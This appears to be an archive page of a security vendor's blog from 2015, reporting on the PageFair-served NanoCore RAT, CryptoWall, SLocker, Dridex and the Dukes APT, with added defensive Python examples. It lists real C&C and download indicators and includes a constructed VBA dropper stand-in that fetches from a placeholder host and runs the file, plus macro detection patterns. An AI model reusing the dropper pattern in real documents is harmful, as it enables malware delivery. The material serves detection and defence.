Halloween RAT: NanoCore Served Via PageFair Service

Over the weekend, PageFair, a counter-ad-block solutions provider, was compromised via a spearphishing attack. The attackers performed a password reset, which gave them access to PageFair’s account on a Content Distribution Network (CDN) service. The attackers then replaced PageFair’s JavaScript with a malicious one:
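A swapped CDN script is exactly the failure that Subresource Integrity (SRI) is meant to catch: the site embedding the third-party script pins a hash in the `integrity` attribute of its `<script>` tag, and the browser refuses to run bytes that do not match. The Python below is an added example, not code from the original post or from PageFair; the script content is a constructed stand-in, the CDN URL is hypothetical, and the function names are this example's own. It computes the integrity value the way browsers expect it (hash algorithm name, hyphen, base64 digest) and shows that any change to the served bytes fails the check.

```python
import base64
import hashlib
import hmac

# Constructed stand-in for the third-party script a site operator reviewed and
# pinned (hypothetical content, not PageFair's real ads.min.js).
PINNED_SCRIPT = b"(function () { window.pf = { version: '1.0' }; })();\n"

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")  # the digests browsers accept for SRI


def sri_integrity(content: bytes, algo: str = "sha384") -> str:
    """Return the value for a <script integrity="..."> attribute:
    '<algo>-<base64 digest>' computed over the exact bytes served."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(served: bytes, expected: str) -> bool:
    """Mimic the browser-side check: recompute the digest over the bytes that
    actually arrived and compare with the pinned value (constant-time)."""
    algo, _, _ = expected.partition("-")
    return hmac.compare_digest(sri_integrity(served, algo), expected)


def script_tag(src: str, content: bytes) -> str:
    """Emit the tag a site operator would place on the page. crossorigin is
    required for SRI on cross-origin scripts, and the CDN must send CORS headers."""
    return (f'<script src="{src}" integrity="{sri_integrity(content)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_integrity(PINNED_SCRIPT)
    print(script_tag("https://cdn.example/ads.min.js", PINNED_SCRIPT))  # hypothetical URL
    # The unchanged file passes; a replaced file (any byte differs) is refused.
    print("unchanged:", verify_integrity(PINNED_SCRIPT, pinned))
    swapped = PINNED_SCRIPT.replace(b"version: '1.0'", b"version: '1.0', injected: true")
    print("swapped:", verify_integrity(swapped, pinned))
```

The caveat a practitioner will raise immediately: SRI only helps where the site operator controls the tag, and a pinned hash also blocks the provider's legitimate updates, so every release has to be reviewed and re-pinned. That friction is the price of not having to trust the provider's CDN account.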

Malicious Javascript: ads.min.js

This is what was shown to visitors of websites that used this PageFair service:

Fake Flash Player Warning

To give you a feel of how popular PageFair is, at least in terms of our user base, we pulled out hit statistics and found that it is ranked at 293 for the past 14 days. That’s higher than flickr.com (295), spotify.com (399), steampowered.com (406) and paypal.com (413). So this domain is quite a celebrity, which explained the spike that we saw during the breach.

Telemetry

During that time, we saw the malicious adobe_flashplayer_7.exe (6ad0393f506bc6e0a84f1325b3d75cca019c21bc) downloaded from these locations:

  • 75.126.160.35
  • 192.155.192.104
  • 184.173.28.170
  • 184.173.28.174
  • 184.173.28.175
  • 184.173.28.176
  • 168.1.88.118

The malware served from these links is a RAT called NanoCore. NanoCore provides plugins such as those related to Network, Security products and Surveillance.

NanoCore Plugins

The C&C of the particular malware sample related to the PageFair compromise was alotpro2.dynu.com (45.35.34.148).
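As an added example (not part of the original post, and not F-Secure's telemetry or detection logic), here is how a defender might sweep their own proxy, DNS and file-event logs for the indicators listed above. The log format is a constructed, simplified one and the sample lines are made up; the indicator values are the ones given in the post.

```python
import re
from urllib.parse import urlsplit

# Indicators as listed in the post: download hosts, payload SHA-1, and C&C.
DOWNLOAD_HOSTS = {
    "75.126.160.35", "192.155.192.104", "184.173.28.170", "184.173.28.174",
    "184.173.28.175", "184.173.28.176", "168.1.88.118",
}
PAYLOAD_SHA1 = "6ad0393f506bc6e0a84f1325b3d75cca019c21bc"
C2_DOMAIN = "alotpro2.dynu.com"
C2_IP = "45.35.34.148"

# Constructed sample log lines (not real telemetry). The format is a simple
# hypothetical one: "<timestamp> <source> <client> <event-specific fields>".
SAMPLE_LOGS = [
    "2015-11-01T10:12:03Z proxy 10.1.2.33 GET http://75.126.160.35/adobe_flashplayer_7.exe 200",
    "2015-11-01T10:12:05Z file 10.1.2.33 adobe_flashplayer_7.exe sha1=6ad0393f506bc6e0a84f1325b3d75cca019c21bc",
    "2015-11-01T10:12:09Z dns 10.1.2.33 query=alotpro2.dynu.com answer=45.35.34.148",
    "2015-11-01T10:12:10Z proxy 10.1.2.33 GET http://45.35.34.148:80/ 200",
    "2015-11-01T10:13:00Z proxy 10.1.2.40 GET http://example.com/index.html 200",
    "2015-11-01T10:13:02Z dns 10.1.2.40 query=example.com answer=93.184.216.34",
    "2015-11-01T10:13:05Z file 10.1.2.40 setup.exe sha1=da39a3ee5e6b4b0d3255bfef95601890afd80709",
]


def indicators_for(line: str) -> list:
    """Return a label for every indicator the line matches (empty if clean)."""
    hits = []
    parts = line.split()
    if len(parts) < 4:
        return hits
    source = parts[1]
    if source == "proxy" and len(parts) >= 5:
        # urlsplit().hostname drops the port, so "45.35.34.148:80" still matches.
        host = (urlsplit(parts[4]).hostname or "").lower()
        if host in DOWNLOAD_HOSTS:
            hits.append(f"download-host:{host}")
        if host in (C2_DOMAIN, C2_IP):
            hits.append(f"c2:{host}")
    elif source == "dns":
        fields = dict(f.split("=", 1) for f in parts[3:] if "=" in f)
        if fields.get("query", "").lower() == C2_DOMAIN:
            hits.append(f"c2-domain:{C2_DOMAIN}")
        if fields.get("answer") == C2_IP:
            hits.append(f"c2-ip:{C2_IP}")
    elif source == "file":
        m = re.search(r"sha1=([0-9a-f]{40})", line)
        if m and m.group(1) == PAYLOAD_SHA1:
            hits.append(f"payload-sha1:{PAYLOAD_SHA1}")
    return hits


def scan(lines) -> dict:
    """Map each matching line to its indicator labels; clean lines are omitted."""
    report = {}
    for line in lines:
        hits = indicators_for(line)
        if hits:
            report[line] = hits
    return report


def affected_clients(lines) -> list:
    """Client addresses (third field) that touched any indicator: the triage list."""
    return sorted({line.split()[2] for line in scan(lines)})


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOGS).items():
        print(hits, "<-", line)
    print("clients to triage:", affected_clients(SAMPLE_LOGS))
```

The point of matching on several sources at once is that each one survives a different evasion: the download hosts rotate, the hash changes with every rebuild, but a client that resolved the C&C domain is a client that ran the payload, whatever its hash.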

Network Events

Users that had our product enabled were protected against this threat at the time of the compromise through the detection Trojan:W32/Golroted.6ad0393f50!Online.

For more information about the PageFair breach and its current status, you may read more about it via this link.



The Contents Of This CryptoWall Zip File Cost $1,000

“Payment is made successfully.”

This is CryptoWall’s Decrypter Service after ransom has been paid.

Payment is made successfully.

And this (decrypt.zip) is what you get for your money (Bitcoin).

The contents of decrypt.zip.

It’s really not much to look at. But without a copy of your keys… you’ll never decrypt your files.

Which is probably why the FBI says:

To be honest, we often advise people just to pay the ransom.

Don’t want to find yourself needing to follow the FBI’s advice?

Then do this:

  • Back up your stuff!
  • Uninstall software and/or disable browser plugins that you don’t use.
  • Keep the software that you do use up to date.

@5ean5ullivan



SLocker Versus Marshmallow

Android ransomware SLocker recently began taking advantage of Android Lollipop flaws in a very serious (and devious) way. But how does SLocker fare against Android Marshmallow?

First, let’s take a look at SLocker versus Lollipop.

Malvertising is typically used to bait men (yeah, probably just men) into downloading an app called “Porn Droid”.

Porn Droid app

Typically all-too-common sorts of overreaching permissions are requested.

PornPro app permissions

So that’s a small social engineering barrier at best.

PornPro permissions continued

If you have a good security app installed, you’ll see something such as this.

This app contains a virus

But if you don’t, and open the app, this is the prompt you’ll receive.

Disguised request for admin permissions

Update patch installation

That “Continue” button? It’s obfuscating a request for device administrator permissions. (A very big flaw, indeed.) And if you click to continue, SLocker will use its newly acquired admin privileges to launch its extortion scheme.

FBI-themed ransomware.

Slocker's FBI Warning

The FBI apparently accepts “PayPal My Cash” to pay the “fine” (extortion).

PayPal My Cash

In its effort to intimidate the victim, SLocker takes a photo with the front-facing camera.

This example is pointed towards the ceiling above Zimry’s desk.

Slocker tries to take a picture.

And a PRISM logo is thrown in for good measure.

FBI Mission: PRISM

It’s worth mentioning at this point that it seems surprisingly easy to grant administrator rights to Android applications. Apple’s iOS requires a passcode for setting up something as basic as a VPN. But Android only requires a simple “yes” to a prompt for administrator rights.

A good computer security practice is to run as a “user” from a restricted profile that limits installations. Applications seeking administrator rights then need to be installed from the “admin” profile and require a passcode. So we attempted to configure a restricted profile for ordinary use but found it difficult to manage. Android’s restricted profiles are designed for and focus on parental control and tablets. Setting up an additional profile on our test phone didn’t really result in the sort of device management we wanted. It only created an additional profile, not a restricted one.

By comparison, Apple’s iOS Restrictions are much more useful even for the primary device user.

But now…

How does Android Marshmallow fare against SLocker?

Good news! SLocker’s “continue” obfuscation fails on a phone running Marshmallow, so you’ll see just what giving administrator rights entails. It’s bad: the power to erase all data, to change the screen lock, and to set storage encryption. In other words, if you give SLocker administrator rights… you’re done. If the phone’s data isn’t backed up, there’s no getting it back other than giving in to the extortioners.

Activate Device Administrator

But then the bad news: Android Marshmallow was released on October 5th and isn’t yet prevalent. So SLocker likely has a viable attack vector for quite some time to come.

Hashes:

0f25cefa85a0822a08ad23caca24a622fbf4aef0
12dc90592c1945fe647d04902b2707e756e88037
25311dfbc4961a661494a2767d2fb74c532539cc
68e7879074b9e2635d895616d4862383fe5960db
84b541957d7e42b4b7d95763fb48d03fcca21ffd
c0784e974da5b7e82e9921763f957e1f3ec024e7

Analysis of Trojan:Android/Slocker.BJ provided by Zimry Ong.



Dridex Takedown

The UK National Crime Agency together with the FBI and the US Department of Justice recently filed charges against the author of Bugat/Cridex/Dridex. Andrey Ghinkul was arrested on August 28, 2015 in Cyprus and the US is now seeking his extradition. Dridex has reportedly caused multi-million dollar losses to financial institutions and businesses globally.

Dridex is known to propagate via Microsoft Word documents which pretend to be legitimate but contain malicious macro code. These macros will eventually download an executable from its C&C and/or a compromised website. F-Secure has generic detection (Trojan:W97M/MaliciousMacro.GEN) that specifically looks for malicious macros inside Office document files.
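As an added example of the kind of heuristic a generic macro detection can rest on (this is not F-Secure’s Trojan:W97M/MaliciousMacro.GEN and is not code from the original post), the Python below scores extracted VBA source on two things: an auto-run entry point, and capabilities a document has no business having. Both macro samples are constructed; the “dropper” one is a deliberately non-functional stand-in for the download-and-run pattern the post describes. Pulling the VBA out of an actual .doc or .docm is out of scope here (tools such as olevba do that); the function takes the source text.

```python
import re

# Heuristic indicators. AUTO_RUN catches the entry points Office invokes by
# itself when a document is opened; SUSPICIOUS catches capabilities that a
# letter or an invoice has no business having.
AUTO_RUN = re.compile(r"\bSub\s+(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", re.I)
SUSPICIOUS = {
    "download": re.compile(r"URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "execute": re.compile(r"\bShell\b|WScript\.Shell|Shell\.Application", re.I),
    "file-write": re.compile(r"ADODB\.Stream|Scripting\.FileSystemObject|\bOpen\b.+\bFor\s+Binary\b", re.I),
    "obfuscation": re.compile(r"\bChr[W$]?\(\s*\d+\s*\)|StrReverse\(", re.I),
}

# Constructed VBA samples (not real malware). The second one is a deliberately
# non-functional stand-in for the "download a file, then run it" pattern.
BENIGN_MACRO = """
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
"""

DROPPER_MACRO = """
Private Declare Function URLDownloadToFileA Lib "urlmon" ( ... ) As Long
Sub AutoOpen()
    Dim p As String
    p = Environ("TEMP") & "/" & Chr(117) & ".exe"
    URLDownloadToFileA 0, "http://C2-PLACEHOLDER/", p, 0, 0
    Shell p, vbHide
End Sub
"""


def assess_macro(vba: str) -> dict:
    """Score VBA source text and return the evidence together with a verdict."""
    auto_run = AUTO_RUN.search(vba) is not None
    indicators = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(vba))
    score = len(indicators) + (2 if auto_run else 0)
    if auto_run and ({"download", "execute"} & set(indicators)):
        verdict = "malicious"      # runs on open and fetches or launches something
    elif score > 0:
        verdict = "suspicious"     # worth a look, but could be legitimate automation
    else:
        verdict = "clean"
    return {"auto_run": auto_run, "indicators": indicators,
            "score": score, "verdict": verdict}


if __name__ == "__main__":
    for name, src in (("benign", BENIGN_MACRO), ("dropper", DROPPER_MACRO)):
        print(name, assess_macro(src))
```

The false-positive side matters: business macros that call Shell to open a report are common, which is why the verdict above only says “malicious” when an auto-run entry point is combined with a download or execute capability. Everything else is “suspicious” for an analyst to look at, and string heuristics like these are exactly what a behavioral layer of the kind described in the post is there to back up.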

As the authorities clean up the Dridex botnet, the effect on detections of malicious macros has been noticeable: a spike can be seen in our back-end statistics.

F-Secure customers are protected by our Hydra (scanning engine) and DeepGuard (behavioral-based) technologies.

Virus and spyware history Trojan:W97M/MaliciousMacro.GEN

Trojan:W97M/MaliciousMacro.GEN detected.

F-Secure Internet Security, Harmful file removed

Harmful file removed.

Besides generic signature detection of malicious macros, our DeepGuard behavioral engine also blocks the behavior. Two layers of protection are better than one.

F-Secure Internet Security, Application blocked

Application blocked for bad behavior.

A document dropping an executable? Yeah, that’s never a good thing.

Q: Are these Dridex activities all related to authorities taking down the botnet?
A: We don’t know.



Marshmallow Moves Android Towards iOS-like Permissions

Android 6.0 a.k.a. “Marshmallow” is now rolling out and its best new feature, from my point of view, is the introduction of a new permissions model.

Well-crafted applications can now ask for permissions as they are needed, rather than all at once during installation.

Android Marshmallow App Permissions

Source: Google

Apps designed for older versions of Android will still ask for numerous permissions upfront, but Marshmallow will allow for iOS-like granular control.

Marshmallow App Permissions Facebook

Not all apps will fail gracefully if permissions are denied.

Marshmallow App Permissions Deny Warning

But if for example you don’t want to use Facebook’s Find Friends feature, then there really shouldn’t be any need for the Facebook app to access your Contacts. I’d suggest denying various permissions and testing the “necessary evils” that you might have installed on your Marshmallow phone.

Conscientious developers will update their apps sooner rather than later.

And if they don’t… well, that’s what reviews are for. Right?

Android 6.0 Changes

See all of the changes to Android 6.0 here.

@5ean5ullivan



VB2015

Mikko missed VB2015 this year… allegedly.



CISA Q&A

On September 10, 2015 the US House (Select) Intelligence Committee held a hearing on World Wide Cyber Threats.

House (Select) Intelligence Committee Hearing on World Wide Cyber Threats – September 10, 2015

“Global Cyber Threats”

In his opening statement, ranking member Adam B. Schiff commented on the purpose of the Protecting Cyber Networks Act – the US House’s version of CISA.

House (Select) Intelligence Committee Hearing on World Wide Cyber Threats – Transcript

Source: C-SPAN

Here’s the full relevant text.

House (Select) Intelligence Committee Hearing on World Wide Cyber Threats – Schiff Opening Statement

So there you have it, the purpose of CISA is “to share malware.”

Q: And should you believe that?

A: Yeah, that’s its purpose: information sharing equals sharing malware samples.

Q: Is CISA a surveillance bill?

A: No it isn’t… not from where I sit at least.

Q: But is CISA a good bill?

A: No, I don’t think so.

Q: Why?

A: Because from my point of view, CISA appears to be nothing more than corporate welfare for the military-digital complex.

Q: Will CISA become law?

A: All signs point to… yes.

@5ean5ullivan



CryptoWall’s “Customer Journey” Sounds Like A Real Nightmare

The latest episode of Radiolab has what is without a doubt the best malware victim interview I’ve ever heard. Inna Simone’s computer was infected by CryptoWall late last year and, based on her telling of it, the worst part of the experience was trying to buy the Bitcoin she needed to pay off the extortionists. In her words, she was a “double victim!”

CryptoWall Decrypter Service

Inna’s daughter, journalist Alina Simone, wrote about the experience in the January 2, 2015 edition of the New York Times. Both later appeared in an 8 minute segment on the April 18, 2015 airing of PBS NewsHour. But to get the full effect of Inna’s darkly humorous point of view, listen to the Radiolab story.

Here’s a screenshot of the related CryptoWall “Decrypter Service” which includes recommendations for numerous Bitcoin vendors.

CryptoWall Decrypter Service Instructions

“Although it’s not yet easy to buy bitcoins, it’s getting simpler every day.”

So, just how many people have been in the same situation as Inna? Good numbers are difficult to come by, but at least 82,000 people have watched this CryptoWall Decrypter demo video.

YouTube Statistics CryptoWall Decrypter

In the image above, do you see the dip in daily views during January? Looks to me like CryptoWall took time off for Orthodox Christmas.

The amount of money CryptoWall demands varies based on location, but $500 USD seems to be fairly common. At that amount, if just 10 percent of 82,000 people pay, it’s worth 4.1 million dollars to the gang of extortionists.

Or a “little fee” as “Goldpis Isda” calls it.

Google Plus Goldpis Isda

@5ean5ullivan



The Dukes: 7 Years Of Russian Cyber-Espionage

The Dukes

Today we release a new whitepaper on an APT group commonly referred to as “the Dukes”. We believe that the Dukes are a well-resourced, highly dedicated, and organized cyber-espionage group that has been working for the Russian government since at least 2008 to collect intelligence in support of foreign and security policy decision-making.

The Dukes (sometimes also referred to as APT29) are known to employ a wide arsenal of malware toolsets including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka HAMMERTOSS [PDF]).

Despite the extensive technical research by us and others into many of the toolsets of the Dukes, we felt that we were still missing crucial parts of the story. Meanwhile, others had envisioned how the story might look, but had concluded that “it is difficult to lead the defense against that which one is not aware of or does not comprehend.” (Maldre, 2015)

With this in mind, we recently set out on a journey back through all of our previous research on the Dukes looking for clues and threads that we might have missed or whose importance we might not have understood at the time. Through this process, we were able to uncover clues pointing to the existence of two previously unidentified Duke malware toolsets, PinchDuke and GeminiDuke.

Timeline of known activity for the various Duke toolkits.

While we had previously analyzed malware from both toolsets, what we hadn’t understood at the time was their context. With the discovery of new clues such as these two toolsets, we went rummaging through our troves of old malware searching for cases that we had previously not known to attribute to the Dukes. Through this process of proverbial connect-the-dots, we were able to slowly build a bigger, better picture of the Dukes and uncover new details of their over 7 years of activities.

The whitepaper [PDF], with all of these juicy details (plus sample hashes), is available here.

The Dukes – TLP: White



Another LinkedIn Sockpuppet

According to LinkedIn, 11 of my connections can introduce me to someone who “knows” Anna.

https://hk.linkedin.com/pub/anna-sentina/100/757/193

Sr Researcher at “Head Hunter”.

I’m not so sure about that.

According to IMDb, Anna Sentina is really Anna Akana.

http://www.imdb.com/name/nm4331196/

Anna’s IMDb profile.

Maybe LinkedIn should start charging to “verify” recruiter accounts?

At the moment, there’s zero overhead when creating a recruiter sockpuppet. Adding at least some amount of cost would do two things. First, it would add value to actual recruiters. And second, it would help clean out the fakes as LinkedIn’s security team could then scrutinize the accounts of so-called recruiters who decide not to verify. Alternatively, accounts claiming to be recruiters that aren’t verified could be labeled as “unverified”.

But that’s probably not going to happen anytime soon. So for now, try to be selective with your LinkedIn connections.

@5ean5ullivan

Related: LinkedIn Sockpuppets Are Targeting Security Researchers



Can the “Speakularity” Be Secured?

In December 2010, journalist Matt Thompson predicted a future in which “automatic speech transcription will become fast, free, and decent.” He called this future the “Speakularity” – playing on the concept of the technological singularity. In Thompson’s words: “So much of the raw material of journalism consists of verbal exchanges — phone conversations, press conferences, […]

2015-09-14

Freedome Tracking Protection Comparison

Labs Fellow Edilberto Cajucom recently tested¹ our Freedome VPN‘s Tracking Protection feature to measure its effect on the page load speed and size of numerous popular sites. Here’s a graph of speed comparisons using a subset of sites from Alexa’s news category. As you can see, there’s quite a measurable effect on several sites; Huffington […]

2015-09-11

Apple iOS 9 Security Features

Apple’s September Event 2015 takes place today so 9/9 = iOS 9 announcements. Apple is promising improved security with iOS 9. Implementing six-digit passcodes for Touch ID is one well publicized example. Security researcher Frederic Jacobs has an excellent summary of other documented changes on Medium. A small change that I’ve noticed while testing iOS […]

2015-09-09

Sofacy Recycles Carberp and Metasploit Code

1. Introduction The Sofacy Group (also known as Pawn Storm or APT28) is well known for deploying zero-day exploits in their APT campaigns. For example, two recent zero-days used by the Sofacy Group were exploiting vulnerabilities in Microsoft Office CVE-2015-2424 and Java CVE-2015-2590. If the exploit is successful, it installs a Sofacy downloader component, which is different from […]

2015-09-08

Buy Your Freedome With Cash Money

Our Freedome sales team ran a special promotion over the weekend and when I Tweeted about it, several people asked about the privacy of our payments processor. Short answer is this: we don’t get any access to your personal information. But what if you still don’t want to deal with ecommerce? No problem. You can […]

2015-09-07

Today’s Best Email

Software engineers automate everything… Goodbye “Markov”!

2015-09-04

LinkedIn Sockpuppets Are Targeting Security Researchers

Multiple LinkedIn accounts recently targeted numerous security specialists in an attempt to map their social graphs. Several of our researchers received these LinkedIn invitations themselves and Daavid from our Threat Intelligence team decided to investigate. Here’s an example of one so-called “recruiter” account. Areas of interest include pen testing and social engineering? You don’t say. […]

2015-09-03

You’ve Got Robot Mail

I listened to the BBC World Service’s Click podcast this morning during my commute and learned that Posti (Finland’s postal services provider) is testing drone delivery. Posti has a video of the “robottikopteri” in action on its YouTube channel. Coincidentally, on my walk home last night, I heard the sound of a quadcopter flying around […]

2015-09-02

Trackers Are Out Of Control

Modern web analytics and tracking are completely out of control. And it’s not even a privacy issue for me at this point – it’s more about usability. Trackers are practically recreating the “dial-up Internet” experience. (Ask your parents, kids.) It’s 2015 – but a lot of websites load like it’s 1999. And it seems like […]

2015-09-01

Visiting INTERPOL’s New Complex

Me and Su Gim Goh from our Malaysian lab had a chance this week to visit INTERPOL’s new Global Complex for Innovation which is located in Singapore. Inside, a fleet of analysts from around the world investigate international crime – including cyber-crime. While we can’t go into details, it was nevertheless impressive to see the level of […]

2015-08-28